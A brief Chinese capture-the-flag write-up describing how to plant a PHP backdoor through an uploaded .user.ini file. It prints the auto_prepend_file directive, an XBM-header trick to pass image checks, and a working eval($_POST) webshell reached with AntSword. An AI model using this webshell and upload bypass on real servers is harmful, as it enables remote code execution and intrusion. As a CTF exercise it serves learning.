参考:https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html
有点类似于.htaccess文件
利用.user.ini文件留后门
利用.user.ini指定文件,在其当前目录下的文件执行时会将你指定的文件中的代码执行出来,以此带入后门
先上传.user.ini文件
#define width 20
#define height 10
auto_prepend_file=phppostma.jpg
再上传post马
提示 <? 在目录中
什么目录呢?
当然是黑名单
利用html语言制作图片马绕过
<script language='php'>@eval($_POST['holo']);</script>
蚁剑访问htmlraoguo.jpg的文件位置下的index.php进入后门得到flag。
(/uploads/da322021d20ea32403f8ea659aca8fc1/index.php)